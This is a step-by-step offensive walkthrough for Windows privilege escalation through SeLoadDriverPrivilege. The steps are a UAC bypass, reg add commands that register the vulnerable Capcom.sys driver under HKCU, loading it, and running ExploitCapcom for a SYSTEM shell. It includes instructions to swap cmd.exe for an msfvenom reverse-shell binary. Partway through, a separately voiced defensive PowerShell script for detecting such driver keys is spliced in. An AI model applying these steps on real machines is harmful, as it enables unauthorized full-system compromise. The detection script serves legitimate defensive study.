SeLoadDriverPrivilege

Enable the permission first: Use UACMe to bypass UAC

It's well known that the driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges

Use this (EnableSeLoadDriverPrivilege.cpp) to load the driver

Add these includes:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Next, compile it with cl.exe like so:

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Add a reference to the driver

Then download the Capcom.sys driver from here and save it to C:\temp (the registry commands below assume C:\Tools\Capcom.sys; the ImagePath must match wherever you saved the file). Then:

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

The odd-looking \??\ prefix used in our malicious driver's ImagePath is an NT object manager path (the DOS devices namespace, where C: is a symbolic link). The driver-loading API resolves this native path to locate and load our malicious driver; a plain Win32 path would not work here.
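From the defender's side, the two registry values above are the whole footprint of this technique: a driver-style service key living under HKCU rather than HKLM\SYSTEM, with an ImagePath outside %SystemRoot%\System32\drivers. The following PowerShell check is an added example, not part of this page or of the UACMe, ExploitCapcom or EopLoadDriver tools; it enumerates such keys, strips the \??\ prefix so the file can be tested, and cross-references the file name against the kernel's loaded-module list (the same information DriverView reports). The function names, the Psapi.Native type name and the HKCU root are assumptions chosen for this example.

```powershell
# Added defensive check (example code, not from the page or the tools it names).
# Loaded kernel modules via EnumDeviceDrivers/GetDeviceDriverFileNameW: a driver
# loaded from an HKCU key via NtLoadDriver never passes through the Service Control
# Manager, so SCM-based views (driverquery, Win32_SystemDriver) will not show it.
Add-Type -Namespace Psapi -Name Native -MemberDefinition @'
[DllImport("psapi.dll", SetLastError=true)]
public static extern bool EnumDeviceDrivers([Out] IntPtr[] lpImageBase, uint cb, out uint lpcbNeeded);
[DllImport("psapi.dll", CharSet=CharSet.Unicode, SetLastError=true)]
public static extern uint GetDeviceDriverFileNameW(IntPtr ImageBase, System.Text.StringBuilder lpFilename, uint nSize);
'@

function Get-LoadedKernelModulePaths {
    [uint32]$needed = 0
    [void][Psapi.Native]::EnumDeviceDrivers($null, 0, [ref]$needed)
    $count = [int]($needed / [IntPtr]::Size)
    $bases = New-Object IntPtr[] $count
    [void][Psapi.Native]::EnumDeviceDrivers($bases, $needed, [ref]$needed)
    foreach ($base in $bases) {
        $sb = New-Object System.Text.StringBuilder 1024
        # Paths come back in native form, e.g. \SystemRoot\System32\drivers\x.sys or \??\C:\...
        if ([Psapi.Native]::GetDeviceDriverFileNameW($base, $sb, $sb.Capacity) -gt 0) { $sb.ToString() }
    }
}

function Get-SuspiciousHkcuDriverKeys {
    [CmdletBinding()]
    param(
        # Assumption: the key is registered directly under HKCU\System\CurrentControlSet,
        # as in the reg add commands above.
        [string]$Root = 'HKCU:\System\CurrentControlSet'
    )
    if (-not (Test-Path $Root)) { return @() }
    $driversDir = Join-Path $env:SystemRoot 'System32\drivers'
    $loadedLeafs = @(Get-LoadedKernelModulePaths | ForEach-Object { Split-Path -Leaf $_ })

    Get-ChildItem -Path $Root -ErrorAction SilentlyContinue | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if ($null -eq $props.ImagePath) { return }
        # Strip the NT object-manager prefix (\??\) to get a Win32 path we can test.
        $win32Path = $props.ImagePath -replace '^\\\?\?\\', ''
        $isKernelDriver = ($props.Type -eq 1)   # SERVICE_KERNEL_DRIVER
        $outsideDrivers = -not $win32Path.StartsWith($driversDir, [StringComparison]::OrdinalIgnoreCase)
        if ($isKernelDriver -or $outsideDrivers) {
            [pscustomobject]@{
                Key          = $_.Name
                ImagePath    = $props.ImagePath
                ResolvedPath = $win32Path
                Type         = $props.Type
                FileExists   = Test-Path -LiteralPath $win32Path
                # True if a module with this file name is currently in the kernel.
                Loaded       = [bool]($loadedLeafs -icontains (Split-Path -Leaf $win32Path))
                Reason       = if ($isKernelDriver) { 'Type=1 kernel driver registered under HKCU' } else { 'ImagePath outside System32\drivers' }
            }
        }
    }
}

Get-SuspiciousHkcuDriverKeys | Format-Table -AutoSize
# Only Administrators (and Print Operators) hold this right by default; a non-admin token
# showing it is the precondition the technique depends on.
whoami /priv | Select-String SeLoadDriverPrivilege
```

Run it as the user under investigation: HKCU is per user, so a key planted by a low-privileged account is only visible from that account's hive (or by loading the hive under HKU). The Loaded column is the useful one during triage; a key with Loaded = False and FileExists = True is staging, Loaded = True means the kernel already has the module.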

Verify the driver is not loaded

Use DriverView.exe:

.\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Then run the EnableSeLoadDriverPrivilege.exe that was compiled previously:

EnableSeLoadDriverPrivilege.exe

Verify the Capcom driver is listed

.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom

Use ExploitCapcom Tool to Escalate Privileges

Use ExploitCapcom after compiling

No GUI

If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace "C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example c:\ProgramData\revshell.exe. The relevant function is:

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

The CommandLine string in this example would be changed to:

TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Automating with EopLoadDriver

EopLoadDriver enables SeLoadDriverPrivilege, creates the registry key and loads the driver in one step, taking the service key path (relative to HKCU) and the driver file as arguments:

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.
